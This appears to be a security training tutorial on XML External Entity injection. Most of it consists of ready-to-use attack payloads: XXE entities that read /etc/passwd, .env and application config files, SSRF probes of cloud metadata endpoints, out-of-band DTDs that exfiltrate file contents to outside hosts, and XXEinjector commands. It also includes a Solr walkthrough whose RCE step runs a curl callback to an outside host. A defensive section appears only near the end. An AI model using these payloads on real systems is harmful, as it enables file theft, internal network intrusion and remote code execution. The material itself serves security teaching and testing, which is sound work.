XML External Entity Injection

Exploit XML Parsers to Access Files and Internal Networks

XXE AttacksEntity ExpansionOut-of-Band Exploitation

What You'll Discover

🎯 Why This Matters

XML External Entity injection has become critically important as modern applications increasingly rely on XML for API communications, configuration files, and document processing. XXE vulnerabilities allow attackers to read local files, perform internal network scanning, and even achieve remote code execution through XML parser exploitation. This vulnerability is particularly dangerous in enterprise environments where XML is extensively used for SOAP APIs, document workflows, and data integration.

🔍 What You'll Learn

You'll understand how to identify XXE vulnerabilities in XML processing endpoints and exploit external entity references for file disclosure and SSRF attacks. This includes crafting malicious DTDs for out-of-band data exfiltration, exploiting blind XXE scenarios, and chaining XXE with other vulnerabilities—the same systematic techniques used by security experts to assess XML-based applications and APIs.

🚀 Your First Win

In the next 15 minutes, you'll successfully exploit an XXE vulnerability to read sensitive system files from the server filesystem, demonstrating how seemingly harmless XML processing can lead to complete information disclosure and potential system compromise.

🔧 Try This Right Now

Test basic XXE exploitation against an XML processing endpoint

# Basic XXE payload for file disclosure
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

# Test on XML upload or API endpoint
POST /api/xml-processor HTTP/1.1
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/hostname">
]>
<data>&file;</data>

# Out-of-band XXE for blind scenarios
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://<attacker>/malicious.dtd">
%dtd;
]>
<data>&send;</data>

# Windows file access
<!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

You'll see: How XML parsers process external entities and potentially expose local files or make network requests on behalf of the server. This demonstrates why proper XML parsing configuration is critical for application security.

Skills You'll Master

✅ Core Understanding

  • XML parser behavior and entity processing
  • DTD (Document Type Definition) manipulation
  • External entity reference exploitation
  • Blind XXE detection and exploitation techniques

🔍 Expert Skills

  • Out-of-band data exfiltration methods
  • XXE chaining with SSRF and file inclusion
  • SOAP API and XML upload exploitation
  • Secure XML parsing implementation

Understanding XXE Vulnerabilities

XXE occurs when XML parsers process external entity references without proper security controls

XML External Entity vulnerabilities exist because of how XML parsers are designed to work. When you understand XML's architecture, you'll see why this vulnerability is so powerful and widespread in enterprise applications.

How XML Parsing Actually Works

XML documents can include Document Type Definitions (DTDs) that define the structure and rules for the document. These DTDs support "entities" - essentially variables that can hold text, numbers, or references to external resources. Think of entities as placeholders that the XML parser will replace with actual content when processing the document.

Here's the critical security issue: XML parsers, by default, will automatically fetch and process external entities. This means if an entity references a file path like file:///etc/passwd or a URL like http://internal-server/admin, the parser will attempt to read that file or make that HTTP request on behalf of the application.

This behavior turns every XML processing endpoint into a potential file disclosure and server-side request forgery vulnerability. The XML specification was designed for legitimate use cases like including shared content or referencing external schemas, but attackers exploit this same functionality for malicious purposes.

Why XXE Is So Dangerous in Enterprise Environments

Enterprise applications extensively use XML for data exchange, configuration management, and API communications. SOAP web services, configuration imports, document processing systems, and data integration platforms all rely on XML parsing. Each of these represents a potential attack surface.

When you successfully exploit XXE, you're not just reading files - you're leveraging the application's own XML processing capabilities to perform actions that appear legitimate to security monitoring systems. The requests come from the application server itself, often bypassing network security controls and appearing in logs as normal application behavior.

This is why XXE has been responsible for some of the most significant data breaches and internal network compromises in enterprise security. You're essentially turning the application into your proxy for accessing internal resources and sensitive data.

Common Entry Points

Where XXE vulnerabilities typically appear

SOAP API endpoints
XML file uploads
RSS/Atom feed processing
SVG image uploads
Office document processing
Configuration file imports

Attack Vectors

Methods used to exploit XXE

File disclosure attacks
SSRF via external entities
Denial of service (billion laughs)
Out-of-band data exfiltration
Blind XXE exploitation
Remote code execution

Impact Potential

What attackers can achieve

Source code disclosure
Configuration file theft
Internal network scanning
AWS metadata access
Database credential exposure
Privilege escalation

Tools and Techniques

Successful XXE exploitation combines understanding XML parser behavior with the right tools and methodologies. Security assessments rely on both automated detection capabilities and manual testing techniques to uncover the full scope of XXE vulnerabilities. You'll learn the industry-standard approach that security experts use daily.

The XXE Testing Methodology

Security professionals follow a systematic approach to XXE testing that progresses from discovery to exploitation. This methodology ensures comprehensive coverage and maximizes the chance of finding complex vulnerabilities that simple automated scans might miss.

Step 1: Reconnaissance - Identify all XML processing endpoints through HTTP request analysis, looking for Content-Type headers, file upload functionality, and API documentation that mentions XML support.

Step 2: Basic Detection - Test with simple entity references to confirm that the parser processes external entities. This establishes whether the vulnerability exists before attempting more complex exploitation.

Step 3: Exploitation Development - Craft targeted payloads based on the application technology stack, operating system, and specific files you want to access.

Step 4: Impact Assessment - Determine the full scope of access possible through the vulnerability, including file disclosure, SSRF capabilities, and potential for privilege escalation or remote code execution.

Burp Suite: XXE Testing

Burp Suite is what most security teams use for XXE testing, used by security professionals worldwide for thorough security testing. Understanding how to use Burp Suite effectively for XXE testing puts you in the same league as expert penetration testers who conduct security assessments for major corporations.

Why Burp Suite Excels at XXE Testing

Burp Suite provides several key advantages for XXE testing that make it the preferred choice of security experts. The platform integrates multiple testing approaches in a single interface, allowing you to seamlessly transition from discovery to exploitation to impact assessment.

Burp Proxy captures all HTTP traffic, letting you identify XML processing endpoints you might otherwise miss. Many applications use XML in unexpected places - form submissions, API calls, or file uploads - and Burp Proxy reveals these opportunities.

Burp Repeater enables precise payload crafting and testing. You can modify XML requests in real-time, test different entity references, and immediately see the results. This manual control is essential for understanding exactly how the target application processes XML.

Burp Collaborator solves the challenge of blind XXE testing. When applications don't directly display file contents in responses, Collaborator provides an out-of-band channel to confirm that external entities are being processed and to exfiltrate data.

Step-by-Step Burp Suite XXE Testing Workflow

# Step 1: Proxy Configuration and Traffic Capture
# Configure browser to use Burp Proxy (127.0.0.1:8080)
# Browse target application while Burp captures all requests
# Look for requests with Content-Type: application/xml or text/xml

# Step 2: Identify XML Processing Endpoints
# Review captured requests in Proxy history
# Search for XML content in request bodies
# Note endpoints that accept file uploads (potential XML file processing)

# Step 3: Basic XXE Detection in Burp Repeater
# Right-click captured XML request → Send to Repeater
# Modify the XML to include a simple external entity reference

POST /api/process HTTP/1.1
Host: <target>
Content-Type: application/xml
Content-Length: 154

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data>
  <user>&xxe;</user>
  <action>process</action>
</data>

# Step 4: Analyze Response for Direct File Disclosure
# Send request and examine response body
# Look for file contents in response (direct XXE)
# Check for error messages that might reveal file paths

# Step 5: Burp Collaborator for Blind XXE Testing
# Go to Burp Collaborator client → Copy to clipboard
# Create payload using Collaborator domain

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % dtd SYSTEM "http://abcd1234efgh.burpcollaborator.net/xxe.dtd">
%dtd;
]>
<data>&send;</data>

# Step 6: Monitor Collaborator Interactions
# Return to Collaborator client → Poll now
# Check for DNS lookups or HTTP requests
# Confirms that external entities are being processed

# Step 7: Data Exfiltration via Collaborator
# Host malicious DTD file on Collaborator domain
# Use parameter entities to exfiltrate file contents

# Example DTD content for data exfiltration:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://abcd1234efgh.burpcollaborator.net/exfil?data=%file;'>">
%eval;

# Step 8: Automated Testing with Burp Scanner
# Right-click target → Scan
# Enable XXE-specific scan checks
# Review Scanner results for additional XXE vectors

Expert Tip: Burp Suite's integrated approach means you can discover XXE vulnerabilities through Proxy, exploit them manually in Repeater, confirm blind attacks with Collaborator, and scale testing with Scanner - all within the same platform that security experts use for enterprise assessments.

Manual XXE Testing Techniques

Manual testing techniques provide deeper understanding of XXE behavior and enable detection of complex vulnerabilities that automated tools might miss.

Systematic XXE Payload Testing

# Basic file disclosure test
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>

# Windows system file access
<!ENTITY win SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">

# Application-specific file targeting
<!ENTITY config SYSTEM "file:///var/www/html/config.php">
<!ENTITY env SYSTEM "file:///.env">
<!ENTITY db SYSTEM "file:///opt/app/database.yml">

# PHP wrapper exploitation (if supported)
<!ENTITY php SYSTEM "php://filter/convert.base64-encode/resource=index.php">

# SSRF via XXE
<!ENTITY ssrf SYSTEM "http://169.254.169.254/latest/meta-data/">
<!ENTITY internal SYSTEM "http://internal-service:8080/admin">

# Out-of-band data exfiltration
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/xxe.dtd">
%dtd;
]>
<data>%send;</data>

# xxe.dtd content for data exfiltration:
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://hackerdna.xss.ht/collect?data=%file;'>">
%eval;

Manual testing allows security experts to understand application behavior, test edge cases, and develop targeted exploitation strategies based on the specific XML implementation.

XXEinjector: Specialized Automation

XXEinjector is a specialized Ruby tool for automating XXE exploitation. While not as widely used as Burp Suite, it provides dedicated automation for complex XXE scenarios and advanced exploitation techniques.

XXEinjector Usage Examples

# Install XXEinjector
git clone https://github.com/enjoiz/XXEinjector.git
cd XXEinjector

# Basic file enumeration
ruby XXEinjector.rb --host=<target> --path=/api/xml --file=/etc/passwd

# Directory enumeration
ruby XXEinjector.rb --host=<target> --path=/upload --enumeration

# Out-of-band testing
ruby XXEinjector.rb --host=<target> --path=/process --oob=http --file=/var/www/html/config.php

# SOAP endpoint testing
ruby XXEinjector.rb --host=<target> --path=/soap/service --headers="SOAPAction: processData" --file=/etc/passwd

# Custom request template
echo 'POST /api/data HTTP/1.1
Host: <target>
Content-Type: application/xml

XXEINJECTION' > request.txt

ruby XXEinjector.rb --host=<target> --file=/etc/passwd --path=/api/data --httpmethod=POST --xml=request.txt

XXEinjector provides automation for complex scenarios but requires understanding of XXE fundamentals and should complement, not replace, manual testing techniques.

Real-World Attack Scenarios

These documented XXE vulnerabilities demonstrate how XML processing flaws have been exploited in real applications, showing the systematic approach that leads to significant discoveries and impact.

Google Toolbar Button Gallery XXE (2014)

Security researchers at Detectify discovered XXE vulnerabilities in Google's Toolbar Button Gallery that allowed reading internal files and performing SSRF attacks against Google's infrastructure. The technical details show systematic XXE exploitation against enterprise systems.

# Step 1: Identify Google Toolbar Button Gallery XML processing
# Google allowed users to submit custom toolbar buttons via XML
# Endpoint: Google Toolbar Button Gallery submission interface

# Step 2: Create malicious toolbar button XML with XXE
# Standard toolbar button format with embedded XXE payload
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE customButtons [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<customButtons>
  <button>
    <title>HackerDNA Button</title>
    <description>&xxe;</description>
    <url>http://hackerdna.com</url>
  </button>
</customButtons>

# Step 3: Advanced payload for Google infrastructure discovery
# Target Google-specific paths and configuration files
<?xml version="1.0"?>
<!DOCTYPE customButtons [
<!ENTITY passwd SYSTEM "file:///etc/passwd">
<!ENTITY hosts SYSTEM "file:///etc/hosts">
<!ENTITY resolv SYSTEM "file:///etc/resolv.conf">
]>
<customButtons>
  <button>
    <title>System Info</title>
    <description>&passwd;</description>
    <tooltip>&hosts;</tooltip>
  </button>
</customButtons>

# Step 4: SSRF exploitation through XXE
# Use XXE to probe internal Google services
<!ENTITY ssrf SYSTEM "http://metadata.google.internal/computeMetadata/v1/">
<!ENTITY internal SYSTEM "http://169.254.169.254/latest/meta-data/">

# Step 5: Out-of-band data exfiltration
# For scenarios where direct response isn't available
<?xml version="1.0"?>
<!DOCTYPE customButtons [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/google.dtd">
%dtd;
]>
<customButtons>
  <button>
    <title>%send;</title>
  </button>
</customButtons>

# google.dtd content:
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://hackerdna.xss.ht/exfil?data=%file;'>">
%eval;

Impact Assessment: The vulnerability allowed reading sensitive configuration files from Google's production servers and performing internal network reconnaissance. Google quickly patched the issue and implemented comprehensive XXE protections across their XML processing infrastructure.

Apache Solr XXE to RCE (CVE-2017-12629)

Apache Solr's XML parsing functionality contained XXE vulnerabilities that could be chained to achieve remote code execution. CVE-2017-12629 demonstrates escalation from XXE to full system compromise through application-specific features.

# Step 1: Identify Solr XML processing endpoint
# Apache Solr accepts XML documents for indexing
# Vulnerable versions: 1.2 to 6.6.0 and 7.0.0 to 7.1.0
# Endpoint: http://<target>:8983/solr/<core>/update

# Step 2: Basic XXE for file disclosure
POST /solr/demo/update HTTP/1.1
Host: <target>:8983
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<add>
<doc>
<field name="id">&xxe;</field>
<field name="title">XXE Test</field>
</doc>
</add>

# Step 3: Advanced XXE for Solr configuration access
# Target Solr-specific configuration and log files
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY config SYSTEM "file:///opt/solr/server/solr/configsets/_default/conf/solrconfig.xml">
<!ENTITY schema SYSTEM "file:///opt/solr/server/solr/demo/conf/schema.xml">
<!ENTITY logs SYSTEM "file:///opt/solr/server/logs/solr.log">
]>
<add>
<doc>
<field name="id">config_disclosure</field>
<field name="config">&config;</field>
<field name="schema">&schema;</field>
</doc>
</add>

# Step 4: Escalation to RCE via configuration manipulation
# Exploit Solr's configuration update API after XXE reconnaissance
POST /solr/demo/config HTTP/1.1
Content-Type: application/json

{
  "add-updateprocessor": {
    "name": "hdna-rce",
    "class": "solr.RunExecutableListener",
    "exe": "/bin/bash",
    "args": ["-c", "curl http://hackerdna.com/callback?data=$(whoami)"]
  }
}

# Step 5: Trigger RCE through document update
POST /solr/demo/update?processor=hdna-rce HTTP/1.1
Content-Type: application/xml

<add><doc><field name="id">rce-test</field></doc></add>

# Result: Remote code execution achieved through XXE discovery
# followed by Solr configuration manipulation

CVE Impact: CVE-2017-12629 affected thousands of Apache Solr installations worldwide. The vulnerability demonstrated how XXE can be chained with application-specific features to achieve remote code execution, leading to complete system compromise. Apache released patches and security guidelines to address this critical issue.

IBM WebSphere XXE Information Disclosure (CVE-2018-1567)

IBM WebSphere Application Server contained XXE vulnerabilities in its XML processing components that allowed attackers to read arbitrary files from the server. CVE-2018-1567 shows how enterprise application servers can be vulnerable to XXE attacks through web service endpoints.

# Step 1: Identify WebSphere web service endpoint
# IBM WebSphere processes SOAP and REST requests with XML
# Vulnerable versions: 7.0, 8.0, 8.5, and 9.0
# Endpoint: /AppName/services/ServiceName

# Step 2: Craft malicious SOAP request with XXE
POST /MyApp/services/DataProcessor HTTP/1.1
Host: <target>:9080
Content-Type: text/xml; charset=utf-8
SOAPAction: "processData"

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header/>
  <soapenv:Body>
    <ns:processData xmlns:ns="http://hackerdna.com/webservice">
      <ns:input>&xxe;</ns:input>
    </ns:processData>
  </soapenv:Body>
</soapenv:Envelope>

# Step 3: Target WebSphere-specific configuration files
<!ENTITY config SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/nodes/Node01/servers/server1/server.xml">
<!ENTITY security SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/security.xml">
<!ENTITY logs SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/logs/server1/SystemOut.log">

# Step 4: Exploit for sensitive data disclosure
<?xml version="1.0"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY wsconfig SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/applications/MyApp.ear/deployments/MyApp/META-INF/application.xml">
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns:getData>
      <ns:config>&wsconfig;</ns:config>
    </ns:getData>
  </soapenv:Body>
</soapenv:Envelope>

# Step 5: Out-of-band exfiltration for blind scenarios
<?xml version="1.0"?>
<!DOCTYPE soapenv:Envelope [
<!ENTITY % file SYSTEM "file:///opt/IBM/WebSphere/AppServer/profiles/AppSrv01/config/cells/Node01Cell/security.xml">
<!ENTITY % dtd SYSTEM "http://hackerdna.xss.ht/websphere.dtd">
%dtd;
]>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Body>
    <ns:probe>%send;</ns:probe>
  </soapenv:Body>
</soapenv:Envelope>

Enterprise Impact: CVE-2018-1567 affected enterprise deployments running IBM WebSphere, potentially exposing sensitive configuration data and application secrets. IBM released security updates and recommended disabling external entity processing in XML parsers as a primary mitigation strategy.

Defensive Countermeasures

Protecting applications from XXE attacks requires implementing multiple layers of defense that work together to prevent external entity processing and limit potential attack impact. These industry-proven strategies form the foundation of secure XML handling in production environments.

Primary Defense: Disable External Entity Processing

The most effective XXE protection is completely disabling DTD processing and external entity resolution in XML parsers. This approach eliminates the root cause by preventing the parser from processing any external entity references, regardless of their source or destination.

  • Disable DTD processing entirely - Configure XML parsers to reject any document containing DTD declarations
  • Block external entity resolution - Prevent parsers from fetching content from external URLs or file paths
  • Disable parameter entity expansion - Block processing of parameter entities that enable complex XXE attacks
  • Remove XInclude support - Disable XInclude functionality that can bypass external entity restrictions
  • Enforce secure defaults - Ensure all XML processing components use secure configurations by default

Implementation Strategies

Successful XXE prevention requires systematic implementation across all XML processing components and consistent application of security policies throughout the development lifecycle.

  • Centralized XML parsing libraries - Use a single, well-configured XML parsing component across the entire application
  • Input validation and sanitization - Validate XML structure and reject documents containing suspicious patterns
  • Regular library updates - Keep XML parsing libraries updated to latest versions with security patches
  • Configuration management - Maintain secure XML parser configurations through automated deployment processes
  • Developer training and guidelines - Ensure development teams understand XXE risks and secure coding practices

Defense in Depth Approaches

Multiple security layers provide comprehensive protection against XXE attacks, ensuring that if one defense mechanism fails, others continue to provide protection against potential exploitation attempts.

  • Network egress filtering - Block outbound connections from application servers to prevent out-of-band data exfiltration
  • File system access controls - Use containerization, chroot jails, or least-privilege principles to limit file system access
  • Cloud metadata protection - Block access to cloud metadata services at the network level (169.254.169.254)
  • Internal network segmentation - Isolate XML processing systems from sensitive internal resources and databases
  • Monitoring and detection - Implement logging and alerting for unusual XML processing patterns and external requests
  • Application firewalls - Deploy WAF rules to detect and block XXE attack patterns in HTTP requests

🎯 You've Got XXE Down!

You now understand how to exploit XML parsers to access files and internal networks through XML External Entity injection. You can craft malicious DTDs, perform out-of-band data exfiltration, and chain XXE with other vulnerabilities using the same systematic techniques that security experts use to assess XML-based applications and APIs.

XXE ExploitationEntity ProcessingOut-of-Band AttacksFile DisclosureSecure XML Parsing

Ready to Secure Modern Web Applications Against All Critical Vulnerabilities